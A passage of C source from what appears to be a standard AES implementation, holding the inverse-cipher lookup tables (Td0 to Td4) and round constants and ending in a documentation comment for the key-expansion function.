0xa9a9a9a9U, 0x6c6c6c6cU, 0x56565656U, 0xf4f4f4f4U, 0xeaeaeaeaU, 0x65656565U, 0x7a7a7a7aU, 0xaeaeaeaeU, 0x08080808U, 0xbabababaU, 0x78787878U, 0x25252525U, 0x2e2e2e2eU, 0x1c1c1c1cU, 0xa6a6a6a6U, 0xb4b4b4b4U, 0xc6c6c6c6U, 0xe8e8e8e8U, 0xddddddddU, 0x74747474U, 0x1f1f1f1fU, 0x4b4b4b4bU, 0xbdbdbdbdU, 0x8b8b8b8bU, 0x8a8a8a8aU, 0x70707070U, 0x3e3e3e3eU, 0xb5b5b5b5U, 0x66666666U, 0x48484848U, 0x03030303U, 0xf6f6f6f6U, 0x0e0e0e0eU, 0x61616161U, 0x35353535U, 0x57575757U, 0xb9b9b9b9U, 0x86868686U, 0xc1c1c1c1U, 0x1d1d1d1dU, 0x9e9e9e9eU, 0xe1e1e1e1U, 0xf8f8f8f8U, 0x98989898U, 0x11111111U, 0x69696969U, 0xd9d9d9d9U, 0x8e8e8e8eU, 0x94949494U, 0x9b9b9b9bU, 0x1e1e1e1eU, 0x87878787U, 0xe9e9e9e9U, 0xcecececeU, 0x55555555U, 0x28282828U, 0xdfdfdfdfU, 0x8c8c8c8cU, 0xa1a1a1a1U, 0x89898989U, 0x0d0d0d0dU, 0xbfbfbfbfU, 0xe6e6e6e6U, 0x42424242U, 0x68686868U, 0x41414141U, 0x99999999U, 0x2d2d2d2dU, 0x0f0f0f0fU, 0xb0b0b0b0U, 0x54545454U, 0xbbbbbbbbU, 0x16161616U, }; const uint32_t AES_Td0[256] = { 0x51f4a750U, 0x7e416553U, 0x1a17a4c3U, 0x3a275e96U, 0x3bab6bcbU, 0x1f9d45f1U, 0xacfa58abU, 0x4be30393U, 0x2030fa55U, 0xad766df6U, 0x88cc7691U, 0xf5024c25U, 0x4fe5d7fcU, 0xc52acbd7U, 0x26354480U, 0xb562a38fU, 0xdeb15a49U, 0x25ba1b67U, 0x45ea0e98U, 0x5dfec0e1U, 0xc32f7502U, 0x814cf012U, 0x8d4697a3U, 0x6bd3f9c6U, 0x038f5fe7U, 0x15929c95U, 0xbf6d7aebU, 0x955259daU, 0xd4be832dU, 0x587421d3U, 0x49e06929U, 0x8ec9c844U, 0x75c2896aU, 0xf48e7978U, 0x99583e6bU, 0x27b971ddU, 0xbee14fb6U, 0xf088ad17U, 0xc920ac66U, 0x7dce3ab4U, 0x63df4a18U, 0xe51a3182U, 0x97513360U, 0x62537f45U, 0xb16477e0U, 0xbb6bae84U, 0xfe81a01cU, 0xf9082b94U, 0x70486858U, 0x8f45fd19U, 0x94de6c87U, 0x527bf8b7U, 0xab73d323U, 0x724b02e2U, 0xe31f8f57U, 0x6655ab2aU, 0xb2eb2807U, 0x2fb5c203U, 0x86c57b9aU, 0xd33708a5U, 0x302887f2U, 0x23bfa5b2U, 0x02036abaU, 0xed16825cU, 0x8acf1c2bU, 0xa779b492U, 0xf307f2f0U, 0x4e69e2a1U, 0x65daf4cdU, 0x0605bed5U, 0xd134621fU, 0xc4a6fe8aU, 0x342e539dU, 0xa2f355a0U, 0x058ae132U, 
0xa4f6eb75U, 0x0b83ec39U, 0x4060efaaU, 0x5e719f06U, 0xbd6e1051U, 0x3e218af9U, 0x96dd063dU, 0xdd3e05aeU, 0x4de6bd46U, 0x91548db5U, 0x71c45d05U, 0x0406d46fU, 0x605015ffU, 0x1998fb24U, 0xd6bde997U, 0x894043ccU, 0x67d99e77U, 0xb0e842bdU, 0x07898b88U, 0xe7195b38U, 0x79c8eedbU, 0xa17c0a47U, 0x7c420fe9U, 0xf8841ec9U, 0x00000000U, 0x09808683U, 0x322bed48U, 0x1e1170acU, 0x6c5a724eU, 0xfd0efffbU, 0x0f853856U, 0x3daed51eU, 0x362d3927U, 0x0a0fd964U, 0x685ca621U, 0x9b5b54d1U, 0x24362e3aU, 0x0c0a67b1U, 0x9357e70fU, 0xb4ee96d2U, 0x1b9b919eU, 0x80c0c54fU, 0x61dc20a2U, 0x5a774b69U, 0x1c121a16U, 0xe293ba0aU, 0xc0a02ae5U, 0x3c22e043U, 0x121b171dU, 0x0e090d0bU, 0xf28bc7adU, 0x2db6a8b9U, 0x141ea9c8U, 0x57f11985U, 0xaf75074cU, 0xee99ddbbU, 0xa37f60fdU, 0xf701269fU, 0x5c72f5bcU, 0x44663bc5U, 0x5bfb7e34U, 0x8b432976U, 0xcb23c6dcU, 0xb6edfc68U, 0xb8e4f163U, 0xd731dccaU, 0x42638510U, 0x13972240U, 0x84c61120U, 0x854a247dU, 0xd2bb3df8U, 0xaef93211U, 0xc729a16dU, 0x1d9e2f4bU, 0xdcb230f3U, 0x0d8652ecU, 0x77c1e3d0U, 0x2bb3166cU, 0xa970b999U, 0x119448faU, 0x47e96422U, 0xa8fc8cc4U, 0xa0f03f1aU, 0x567d2cd8U, 0x223390efU, 0x87494ec7U, 0xd938d1c1U, 0x8ccaa2feU, 0x98d40b36U, 0xa6f581cfU, 0xa57ade28U, 0xdab78e26U, 0x3fadbfa4U, 0x2c3a9de4U, 0x5078920dU, 0x6a5fcc9bU, 0x547e4662U, 0xf68d13c2U, 0x90d8b8e8U, 0x2e39f75eU, 0x82c3aff5U, 0x9f5d80beU, 0x69d0937cU, 0x6fd52da9U, 0xcf2512b3U, 0xc8ac993bU, 0x10187da7U, 0xe89c636eU, 0xdb3bbb7bU, 0xcd267809U, 0x6e5918f4U, 0xec9ab701U, 0x834f9aa8U, 0xe6956e65U, 0xaaffe67eU, 0x21bccf08U, 0xef15e8e6U, 0xbae79bd9U, 0x4a6f36ceU, 0xea9f09d4U, 0x29b07cd6U, 0x31a4b2afU, 0x2a3f2331U, 0xc6a59430U, 0x35a266c0U, 0x744ebc37U, 0xfc82caa6U, 0xe090d0b0U, 0x33a7d815U, 0xf104984aU, 0x41ecdaf7U, 0x7fcd500eU, 0x1791f62fU, 0x764dd68dU, 0x43efb04dU, 0xccaa4d54U, 0xe49604dfU, 0x9ed1b5e3U, 0x4c6a881bU, 0xc12c1fb8U, 0x4665517fU, 0x9d5eea04U, 0x018c355dU, 0xfa877473U, 0xfb0b412eU, 0xb3671d5aU, 0x92dbd252U, 0xe9105633U, 0x6dd64713U, 0x9ad7618cU, 0x37a10c7aU, 0x59f8148eU, 0xeb133c89U, 0xcea927eeU, 0xb761c935U, 0xe11ce5edU, 0x7a47b13cU, 0x9cd2df59U, 0x55f2733fU, 0x1814ce79U, 0x73c737bfU, 0x53f7cdeaU, 0x5ffdaa5bU, 0xdf3d6f14U, 0x7844db86U, 0xcaaff381U, 0xb968c43eU, 0x3824342cU, 0xc2a3405fU, 0x161dc372U, 0xbce2250cU, 0x283c498bU, 0xff0d9541U, 0x39a80171U, 0x080cb3deU, 0xd8b4e49cU, 0x6456c190U, 0x7bcb8461U, 0xd532b670U, 0x486c5c74U, 0xd0b85742U, }; const uint32_t AES_Td1[256] = { 0x5051f4a7U, 0x537e4165U, 0xc31a17a4U, 0x963a275eU, 0xcb3bab6bU, 0xf11f9d45U, 0xabacfa58U, 0x934be303U, 0x552030faU, 0xf6ad766dU, 0x9188cc76U, 0x25f5024cU, 0xfc4fe5d7U, 0xd7c52acbU, 0x80263544U, 0x8fb562a3U, 0x49deb15aU, 0x6725ba1bU, 0x9845ea0eU, 0xe15dfec0U, 0x02c32f75U, 0x12814cf0U, 0xa38d4697U, 0xc66bd3f9U, 0xe7038f5fU, 0x9515929cU, 0xebbf6d7aU, 0xda955259U, 0x2dd4be83U, 0xd3587421U, 0x2949e069U, 0x448ec9c8U, 0x6a75c289U, 0x78f48e79U, 0x6b99583eU, 0xdd27b971U, 0xb6bee14fU, 0x17f088adU, 0x66c920acU, 0xb47dce3aU, 0x1863df4aU, 0x82e51a31U, 0x60975133U, 0x4562537fU, 0xe0b16477U, 0x84bb6baeU, 0x1cfe81a0U, 0x94f9082bU, 0x58704868U, 0x198f45fdU, 0x8794de6cU, 0xb7527bf8U, 0x23ab73d3U, 0xe2724b02U, 0x57e31f8fU, 0x2a6655abU, 0x07b2eb28U, 0x032fb5c2U, 0x9a86c57bU, 0xa5d33708U, 0xf2302887U, 0xb223bfa5U, 0xba02036aU, 0x5ced1682U, 0x2b8acf1cU, 0x92a779b4U, 0xf0f307f2U, 0xa14e69e2U, 0xcd65daf4U, 0xd50605beU, 0x1fd13462U, 0x8ac4a6feU, 0x9d342e53U, 0xa0a2f355U, 0x32058ae1U, 0x75a4f6ebU, 0x390b83ecU, 0xaa4060efU, 0x065e719fU, 0x51bd6e10U, 0xf93e218aU, 0x3d96dd06U, 0xaedd3e05U, 0x464de6bdU, 0xb591548dU, 0x0571c45dU, 0x6f0406d4U, 0xff605015U, 0x241998fbU, 
0x97d6bde9U, 0xcc894043U, 0x7767d99eU, 0xbdb0e842U, 0x8807898bU, 0x38e7195bU, 0xdb79c8eeU, 0x47a17c0aU, 0xe97c420fU, 0xc9f8841eU, 0x00000000U, 0x83098086U, 0x48322bedU, 0xac1e1170U, 0x4e6c5a72U, 0xfbfd0effU, 0x560f8538U, 0x1e3daed5U, 0x27362d39U, 0x640a0fd9U, 0x21685ca6U, 0xd19b5b54U, 0x3a24362eU, 0xb10c0a67U, 0x0f9357e7U, 0xd2b4ee96U, 0x9e1b9b91U, 0x4f80c0c5U, 0xa261dc20U, 0x695a774bU, 0x161c121aU, 0x0ae293baU, 0xe5c0a02aU, 0x433c22e0U, 0x1d121b17U, 0x0b0e090dU, 0xadf28bc7U, 0xb92db6a8U, 0xc8141ea9U, 0x8557f119U, 0x4caf7507U, 0xbbee99ddU, 0xfda37f60U, 0x9ff70126U, 0xbc5c72f5U, 0xc544663bU, 0x345bfb7eU, 0x768b4329U, 0xdccb23c6U, 0x68b6edfcU, 0x63b8e4f1U, 0xcad731dcU, 0x10426385U, 0x40139722U, 0x2084c611U, 0x7d854a24U, 0xf8d2bb3dU, 0x11aef932U, 0x6dc729a1U, 0x4b1d9e2fU, 0xf3dcb230U, 0xec0d8652U, 0xd077c1e3U, 0x6c2bb316U, 0x99a970b9U, 0xfa119448U, 0x2247e964U, 0xc4a8fc8cU, 0x1aa0f03fU, 0xd8567d2cU, 0xef223390U, 0xc787494eU, 0xc1d938d1U, 0xfe8ccaa2U, 0x3698d40bU, 0xcfa6f581U, 0x28a57adeU, 0x26dab78eU, 0xa43fadbfU, 0xe42c3a9dU, 0x0d507892U, 0x9b6a5fccU, 0x62547e46U, 0xc2f68d13U, 0xe890d8b8U, 0x5e2e39f7U, 0xf582c3afU, 0xbe9f5d80U, 0x7c69d093U, 0xa96fd52dU, 0xb3cf2512U, 0x3bc8ac99U, 0xa710187dU, 0x6ee89c63U, 0x7bdb3bbbU, 0x09cd2678U, 0xf46e5918U, 0x01ec9ab7U, 0xa8834f9aU, 0x65e6956eU, 0x7eaaffe6U, 0x0821bccfU, 0xe6ef15e8U, 0xd9bae79bU, 0xce4a6f36U, 0xd4ea9f09U, 0xd629b07cU, 0xaf31a4b2U, 0x312a3f23U, 0x30c6a594U, 0xc035a266U, 0x37744ebcU, 0xa6fc82caU, 0xb0e090d0U, 0x1533a7d8U, 0x4af10498U, 0xf741ecdaU, 0x0e7fcd50U, 0x2f1791f6U, 0x8d764dd6U, 0x4d43efb0U, 0x54ccaa4dU, 0xdfe49604U, 0xe39ed1b5U, 0x1b4c6a88U, 0xb8c12c1fU, 0x7f466551U, 0x049d5eeaU, 0x5d018c35U, 0x73fa8774U, 0x2efb0b41U, 0x5ab3671dU, 0x5292dbd2U, 0x33e91056U, 0x136dd647U, 0x8c9ad761U, 0x7a37a10cU, 0x8e59f814U, 0x89eb133cU, 0xeecea927U, 0x35b761c9U, 0xede11ce5U, 0x3c7a47b1U, 0x599cd2dfU, 0x3f55f273U, 0x791814ceU, 0xbf73c737U, 0xea53f7cdU, 0x5b5ffdaaU, 0x14df3d6fU, 0x867844dbU, 0x81caaff3U, 0x3eb968c4U, 0x2c382434U, 0x5fc2a340U, 0x72161dc3U, 0x0cbce225U, 0x8b283c49U, 0x41ff0d95U, 0x7139a801U, 0xde080cb3U, 0x9cd8b4e4U, 0x906456c1U, 0x617bcb84U, 0x70d532b6U, 0x74486c5cU, 0x42d0b857U, }; const uint32_t AES_Td2[256] = { 0xa75051f4U, 0x65537e41U, 0xa4c31a17U, 0x5e963a27U, 0x6bcb3babU, 0x45f11f9dU, 0x58abacfaU, 0x03934be3U, 0xfa552030U, 0x6df6ad76U, 0x769188ccU, 0x4c25f502U, 0xd7fc4fe5U, 0xcbd7c52aU, 0x44802635U, 0xa38fb562U, 0x5a49deb1U, 0x1b6725baU, 0x0e9845eaU, 0xc0e15dfeU, 0x7502c32fU, 0xf012814cU, 0x97a38d46U, 0xf9c66bd3U, 0x5fe7038fU, 0x9c951592U, 0x7aebbf6dU, 0x59da9552U, 0x832dd4beU, 0x21d35874U, 0x692949e0U, 0xc8448ec9U, 0x896a75c2U, 0x7978f48eU, 0x3e6b9958U, 0x71dd27b9U, 0x4fb6bee1U, 0xad17f088U, 0xac66c920U, 0x3ab47dceU, 0x4a1863dfU, 0x3182e51aU, 0x33609751U, 0x7f456253U, 0x77e0b164U, 0xae84bb6bU, 0xa01cfe81U, 0x2b94f908U, 0x68587048U, 0xfd198f45U, 0x6c8794deU, 0xf8b7527bU, 0xd323ab73U, 0x02e2724bU, 0x8f57e31fU, 0xab2a6655U, 0x2807b2ebU, 0xc2032fb5U, 0x7b9a86c5U, 0x08a5d337U, 0x87f23028U, 0xa5b223bfU, 0x6aba0203U, 0x825ced16U, 0x1c2b8acfU, 0xb492a779U, 0xf2f0f307U, 0xe2a14e69U, 0xf4cd65daU, 0xbed50605U, 0x621fd134U, 0xfe8ac4a6U, 0x539d342eU, 0x55a0a2f3U, 0xe132058aU, 0xeb75a4f6U, 0xec390b83U, 0xefaa4060U, 0x9f065e71U, 0x1051bd6eU, 0x8af93e21U, 0x063d96ddU, 0x05aedd3eU, 0xbd464de6U, 0x8db59154U, 0x5d0571c4U, 0xd46f0406U, 0x15ff6050U, 0xfb241998U, 0xe997d6bdU, 0x43cc8940U, 0x9e7767d9U, 0x42bdb0e8U, 0x8b880789U, 0x5b38e719U, 0xeedb79c8U, 0x0a47a17cU, 0x0fe97c42U, 0x1ec9f884U, 0x00000000U, 0x86830980U, 0xed48322bU, 0x70ac1e11U, 
0x724e6c5aU, 0xfffbfd0eU, 0x38560f85U, 0xd51e3daeU, 0x3927362dU, 0xd9640a0fU, 0xa621685cU, 0x54d19b5bU, 0x2e3a2436U, 0x67b10c0aU, 0xe70f9357U, 0x96d2b4eeU, 0x919e1b9bU, 0xc54f80c0U, 0x20a261dcU, 0x4b695a77U, 0x1a161c12U, 0xba0ae293U, 0x2ae5c0a0U, 0xe0433c22U, 0x171d121bU, 0x0d0b0e09U, 0xc7adf28bU, 0xa8b92db6U, 0xa9c8141eU, 0x198557f1U, 0x074caf75U, 0xddbbee99U, 0x60fda37fU, 0x269ff701U, 0xf5bc5c72U, 0x3bc54466U, 0x7e345bfbU, 0x29768b43U, 0xc6dccb23U, 0xfc68b6edU, 0xf163b8e4U, 0xdccad731U, 0x85104263U, 0x22401397U, 0x112084c6U, 0x247d854aU, 0x3df8d2bbU, 0x3211aef9U, 0xa16dc729U, 0x2f4b1d9eU, 0x30f3dcb2U, 0x52ec0d86U, 0xe3d077c1U, 0x166c2bb3U, 0xb999a970U, 0x48fa1194U, 0x642247e9U, 0x8cc4a8fcU, 0x3f1aa0f0U, 0x2cd8567dU, 0x90ef2233U, 0x4ec78749U, 0xd1c1d938U, 0xa2fe8ccaU, 0x0b3698d4U, 0x81cfa6f5U, 0xde28a57aU, 0x8e26dab7U, 0xbfa43fadU, 0x9de42c3aU, 0x920d5078U, 0xcc9b6a5fU, 0x4662547eU, 0x13c2f68dU, 0xb8e890d8U, 0xf75e2e39U, 0xaff582c3U, 0x80be9f5dU, 0x937c69d0U, 0x2da96fd5U, 0x12b3cf25U, 0x993bc8acU, 0x7da71018U, 0x636ee89cU, 0xbb7bdb3bU, 0x7809cd26U, 0x18f46e59U, 0xb701ec9aU, 0x9aa8834fU, 0x6e65e695U, 0xe67eaaffU, 0xcf0821bcU, 0xe8e6ef15U, 0x9bd9bae7U, 0x36ce4a6fU, 0x09d4ea9fU, 0x7cd629b0U, 0xb2af31a4U, 0x23312a3fU, 0x9430c6a5U, 0x66c035a2U, 0xbc37744eU, 0xcaa6fc82U, 0xd0b0e090U, 0xd81533a7U, 0x984af104U, 0xdaf741ecU, 0x500e7fcdU, 0xf62f1791U, 0xd68d764dU, 0xb04d43efU, 0x4d54ccaaU, 0x04dfe496U, 0xb5e39ed1U, 0x881b4c6aU, 0x1fb8c12cU, 0x517f4665U, 0xea049d5eU, 0x355d018cU, 0x7473fa87U, 0x412efb0bU, 0x1d5ab367U, 0xd25292dbU, 0x5633e910U, 0x47136dd6U, 0x618c9ad7U, 0x0c7a37a1U, 0x148e59f8U, 0x3c89eb13U, 0x27eecea9U, 0xc935b761U, 0xe5ede11cU, 0xb13c7a47U, 0xdf599cd2U, 0x733f55f2U, 0xce791814U, 0x37bf73c7U, 0xcdea53f7U, 0xaa5b5ffdU, 0x6f14df3dU, 0xdb867844U, 0xf381caafU, 0xc43eb968U, 0x342c3824U, 0x405fc2a3U, 0xc372161dU, 0x250cbce2U, 0x498b283cU, 0x9541ff0dU, 0x017139a8U, 0xb3de080cU, 0xe49cd8b4U, 0xc1906456U, 0x84617bcbU, 0xb670d532U, 0x5c74486cU, 0x5742d0b8U, }; const uint32_t AES_Td3[256] = { 0xf4a75051U, 0x4165537eU, 0x17a4c31aU, 0x275e963aU, 0xab6bcb3bU, 0x9d45f11fU, 0xfa58abacU, 0xe303934bU, 0x30fa5520U, 0x766df6adU, 0xcc769188U, 0x024c25f5U, 0xe5d7fc4fU, 0x2acbd7c5U, 0x35448026U, 0x62a38fb5U, 0xb15a49deU, 0xba1b6725U, 0xea0e9845U, 0xfec0e15dU, 0x2f7502c3U, 0x4cf01281U, 0x4697a38dU, 0xd3f9c66bU, 0x8f5fe703U, 0x929c9515U, 0x6d7aebbfU, 0x5259da95U, 0xbe832dd4U, 0x7421d358U, 0xe0692949U, 0xc9c8448eU, 0xc2896a75U, 0x8e7978f4U, 0x583e6b99U, 0xb971dd27U, 0xe14fb6beU, 0x88ad17f0U, 0x20ac66c9U, 0xce3ab47dU, 0xdf4a1863U, 0x1a3182e5U, 0x51336097U, 0x537f4562U, 0x6477e0b1U, 0x6bae84bbU, 0x81a01cfeU, 0x082b94f9U, 0x48685870U, 0x45fd198fU, 0xde6c8794U, 0x7bf8b752U, 0x73d323abU, 0x4b02e272U, 0x1f8f57e3U, 0x55ab2a66U, 0xeb2807b2U, 0xb5c2032fU, 0xc57b9a86U, 0x3708a5d3U, 0x2887f230U, 0xbfa5b223U, 0x036aba02U, 0x16825cedU, 0xcf1c2b8aU, 0x79b492a7U, 0x07f2f0f3U, 0x69e2a14eU, 0xdaf4cd65U, 0x05bed506U, 0x34621fd1U, 0xa6fe8ac4U, 0x2e539d34U, 0xf355a0a2U, 0x8ae13205U, 0xf6eb75a4U, 0x83ec390bU, 0x60efaa40U, 0x719f065eU, 0x6e1051bdU, 0x218af93eU, 0xdd063d96U, 0x3e05aeddU, 0xe6bd464dU, 0x548db591U, 0xc45d0571U, 0x06d46f04U, 0x5015ff60U, 0x98fb2419U, 0xbde997d6U, 0x4043cc89U, 0xd99e7767U, 0xe842bdb0U, 0x898b8807U, 0x195b38e7U, 0xc8eedb79U, 0x7c0a47a1U, 0x420fe97cU, 0x841ec9f8U, 0x00000000U, 0x80868309U, 0x2bed4832U, 0x1170ac1eU, 0x5a724e6cU, 0x0efffbfdU, 0x8538560fU, 0xaed51e3dU, 0x2d392736U, 0x0fd9640aU, 0x5ca62168U, 0x5b54d19bU, 0x362e3a24U, 0x0a67b10cU, 0x57e70f93U, 0xee96d2b4U, 0x9b919e1bU, 0xc0c54f80U, 
0xdc20a261U, 0x774b695aU, 0x121a161cU, 0x93ba0ae2U, 0xa02ae5c0U, 0x22e0433cU, 0x1b171d12U, 0x090d0b0eU, 0x8bc7adf2U, 0xb6a8b92dU, 0x1ea9c814U, 0xf1198557U, 0x75074cafU, 0x99ddbbeeU, 0x7f60fda3U, 0x01269ff7U, 0x72f5bc5cU, 0x663bc544U, 0xfb7e345bU, 0x4329768bU, 0x23c6dccbU, 0xedfc68b6U, 0xe4f163b8U, 0x31dccad7U, 0x63851042U, 0x97224013U, 0xc6112084U, 0x4a247d85U, 0xbb3df8d2U, 0xf93211aeU, 0x29a16dc7U, 0x9e2f4b1dU, 0xb230f3dcU, 0x8652ec0dU, 0xc1e3d077U, 0xb3166c2bU, 0x70b999a9U, 0x9448fa11U, 0xe9642247U, 0xfc8cc4a8U, 0xf03f1aa0U, 0x7d2cd856U, 0x3390ef22U, 0x494ec787U, 0x38d1c1d9U, 0xcaa2fe8cU, 0xd40b3698U, 0xf581cfa6U, 0x7ade28a5U, 0xb78e26daU, 0xadbfa43fU, 0x3a9de42cU, 0x78920d50U, 0x5fcc9b6aU, 0x7e466254U, 0x8d13c2f6U, 0xd8b8e890U, 0x39f75e2eU, 0xc3aff582U, 0x5d80be9fU, 0xd0937c69U, 0xd52da96fU, 0x2512b3cfU, 0xac993bc8U, 0x187da710U, 0x9c636ee8U, 0x3bbb7bdbU, 0x267809cdU, 0x5918f46eU, 0x9ab701ecU, 0x4f9aa883U, 0x956e65e6U, 0xffe67eaaU, 0xbccf0821U, 0x15e8e6efU, 0xe79bd9baU, 0x6f36ce4aU, 0x9f09d4eaU, 0xb07cd629U, 0xa4b2af31U, 0x3f23312aU, 0xa59430c6U, 0xa266c035U, 0x4ebc3774U, 0x82caa6fcU, 0x90d0b0e0U, 0xa7d81533U, 0x04984af1U, 0xecdaf741U, 0xcd500e7fU, 0x91f62f17U, 0x4dd68d76U, 0xefb04d43U, 0xaa4d54ccU, 0x9604dfe4U, 0xd1b5e39eU, 0x6a881b4cU, 0x2c1fb8c1U, 0x65517f46U, 0x5eea049dU, 0x8c355d01U, 0x877473faU, 0x0b412efbU, 0x671d5ab3U, 0xdbd25292U, 0x105633e9U, 0xd647136dU, 0xd7618c9aU, 0xa10c7a37U, 0xf8148e59U, 0x133c89ebU, 0xa927eeceU, 0x61c935b7U, 0x1ce5ede1U, 0x47b13c7aU, 0xd2df599cU, 0xf2733f55U, 0x14ce7918U, 0xc737bf73U, 0xf7cdea53U, 0xfdaa5b5fU, 0x3d6f14dfU, 0x44db8678U, 0xaff381caU, 0x68c43eb9U, 0x24342c38U, 0xa3405fc2U, 0x1dc37216U, 0xe2250cbcU, 0x3c498b28U, 0x0d9541ffU, 0xa8017139U, 0x0cb3de08U, 0xb4e49cd8U, 0x56c19064U, 0xcb84617bU, 0x32b670d5U, 0x6c5c7448U, 0xb85742d0U, }; const uint32_t AES_Td4[256] = { 0x52525252U, 0x09090909U, 0x6a6a6a6aU, 0xd5d5d5d5U, 0x30303030U, 0x36363636U, 0xa5a5a5a5U, 0x38383838U, 0xbfbfbfbfU, 0x40404040U, 0xa3a3a3a3U, 0x9e9e9e9eU, 0x81818181U, 0xf3f3f3f3U, 0xd7d7d7d7U, 0xfbfbfbfbU, 0x7c7c7c7cU, 0xe3e3e3e3U, 0x39393939U, 0x82828282U, 0x9b9b9b9bU, 0x2f2f2f2fU, 0xffffffffU, 0x87878787U, 0x34343434U, 0x8e8e8e8eU, 0x43434343U, 0x44444444U, 0xc4c4c4c4U, 0xdedededeU, 0xe9e9e9e9U, 0xcbcbcbcbU, 0x54545454U, 0x7b7b7b7bU, 0x94949494U, 0x32323232U, 0xa6a6a6a6U, 0xc2c2c2c2U, 0x23232323U, 0x3d3d3d3dU, 0xeeeeeeeeU, 0x4c4c4c4cU, 0x95959595U, 0x0b0b0b0bU, 0x42424242U, 0xfafafafaU, 0xc3c3c3c3U, 0x4e4e4e4eU, 0x08080808U, 0x2e2e2e2eU, 0xa1a1a1a1U, 0x66666666U, 0x28282828U, 0xd9d9d9d9U, 0x24242424U, 0xb2b2b2b2U, 0x76767676U, 0x5b5b5b5bU, 0xa2a2a2a2U, 0x49494949U, 0x6d6d6d6dU, 0x8b8b8b8bU, 0xd1d1d1d1U, 0x25252525U, 0x72727272U, 0xf8f8f8f8U, 0xf6f6f6f6U, 0x64646464U, 0x86868686U, 0x68686868U, 0x98989898U, 0x16161616U, 0xd4d4d4d4U, 0xa4a4a4a4U, 0x5c5c5c5cU, 0xccccccccU, 0x5d5d5d5dU, 0x65656565U, 0xb6b6b6b6U, 0x92929292U, 0x6c6c6c6cU, 0x70707070U, 0x48484848U, 0x50505050U, 0xfdfdfdfdU, 0xededededU, 0xb9b9b9b9U, 0xdadadadaU, 0x5e5e5e5eU, 0x15151515U, 0x46464646U, 0x57575757U, 0xa7a7a7a7U, 0x8d8d8d8dU, 0x9d9d9d9dU, 0x84848484U, 0x90909090U, 0xd8d8d8d8U, 0xababababU, 0x00000000U, 0x8c8c8c8cU, 0xbcbcbcbcU, 0xd3d3d3d3U, 0x0a0a0a0aU, 0xf7f7f7f7U, 0xe4e4e4e4U, 0x58585858U, 0x05050505U, 0xb8b8b8b8U, 0xb3b3b3b3U, 0x45454545U, 0x06060606U, 0xd0d0d0d0U, 0x2c2c2c2cU, 0x1e1e1e1eU, 0x8f8f8f8fU, 0xcacacacaU, 0x3f3f3f3fU, 0x0f0f0f0fU, 0x02020202U, 0xc1c1c1c1U, 0xafafafafU, 0xbdbdbdbdU, 0x03030303U, 0x01010101U, 0x13131313U, 0x8a8a8a8aU, 0x6b6b6b6bU, 0x3a3a3a3aU, 0x91919191U, 0x11111111U, 
0x41414141U, 0x4f4f4f4fU, 0x67676767U, 0xdcdcdcdcU, 0xeaeaeaeaU, 0x97979797U, 0xf2f2f2f2U, 0xcfcfcfcfU, 0xcecececeU, 0xf0f0f0f0U, 0xb4b4b4b4U, 0xe6e6e6e6U, 0x73737373U, 0x96969696U, 0xacacacacU, 0x74747474U, 0x22222222U, 0xe7e7e7e7U, 0xadadadadU, 0x35353535U, 0x85858585U, 0xe2e2e2e2U, 0xf9f9f9f9U, 0x37373737U, 0xe8e8e8e8U, 0x1c1c1c1cU, 0x75757575U, 0xdfdfdfdfU, 0x6e6e6e6eU, 0x47474747U, 0xf1f1f1f1U, 0x1a1a1a1aU, 0x71717171U, 0x1d1d1d1dU, 0x29292929U, 0xc5c5c5c5U, 0x89898989U, 0x6f6f6f6fU, 0xb7b7b7b7U, 0x62626262U, 0x0e0e0e0eU, 0xaaaaaaaaU, 0x18181818U, 0xbebebebeU, 0x1b1b1b1bU, 0xfcfcfcfcU, 0x56565656U, 0x3e3e3e3eU, 0x4b4b4b4bU, 0xc6c6c6c6U, 0xd2d2d2d2U, 0x79797979U, 0x20202020U, 0x9a9a9a9aU, 0xdbdbdbdbU, 0xc0c0c0c0U, 0xfefefefeU, 0x78787878U, 0xcdcdcdcdU, 0x5a5a5a5aU, 0xf4f4f4f4U, 0x1f1f1f1fU, 0xddddddddU, 0xa8a8a8a8U, 0x33333333U, 0x88888888U, 0x07070707U, 0xc7c7c7c7U, 0x31313131U, 0xb1b1b1b1U, 0x12121212U, 0x10101010U, 0x59595959U, 0x27272727U, 0x80808080U, 0xececececU, 0x5f5f5f5fU, 0x60606060U, 0x51515151U, 0x7f7f7f7fU, 0xa9a9a9a9U, 0x19191919U, 0xb5b5b5b5U, 0x4a4a4a4aU, 0x0d0d0d0dU, 0x2d2d2d2dU, 0xe5e5e5e5U, 0x7a7a7a7aU, 0x9f9f9f9fU, 0x93939393U, 0xc9c9c9c9U, 0x9c9c9c9cU, 0xefefefefU, 0xa0a0a0a0U, 0xe0e0e0e0U, 0x3b3b3b3bU, 0x4d4d4d4dU, 0xaeaeaeaeU, 0x2a2a2a2aU, 0xf5f5f5f5U, 0xb0b0b0b0U, 0xc8c8c8c8U, 0xebebebebU, 0xbbbbbbbbU, 0x3c3c3c3cU, 0x83838383U, 0x53535353U, 0x99999999U, 0x61616161U, 0x17171717U, 0x2b2b2b2bU, 0x04040404U, 0x7e7e7e7eU, 0xbabababaU, 0x77777777U, 0xd6d6d6d6U, 0x26262626U, 0xe1e1e1e1U, 0x69696969U, 0x14141414U, 0x63636363U, 0x55555555U, 0x21212121U, 0x0c0c0c0cU, 0x7d7d7d7dU, }; static const u32 rcon[] = { 0x01000000, 0x02000000, 0x04000000, 0x08000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x1B000000, 0x36000000, /* for 128-bit blocks, Rijndael never uses more than 10 rcon values */ }; /** * Expand the cipher key into the encryption key schedule. 
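 *
 * Returns 0 on success, -1 if userKey or key is NULL, and -2 if the key
 * size is not 128, 192 or 256 bits.
 *
 * Usage sketch (illustrative only, not part of the original source; the
 * all-zero key and plaintext below are assumptions made for the example):
 *
 *   AES_KEY ek;
 *   unsigned char k[16] = {0}, in[16] = {0}, out[16];
 *   if (AES_set_encrypt_key(k, 128, &ek) == 0)
 *       AES_encrypt(in, out, &ek);    (encrypts one 16-byte ECB block)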
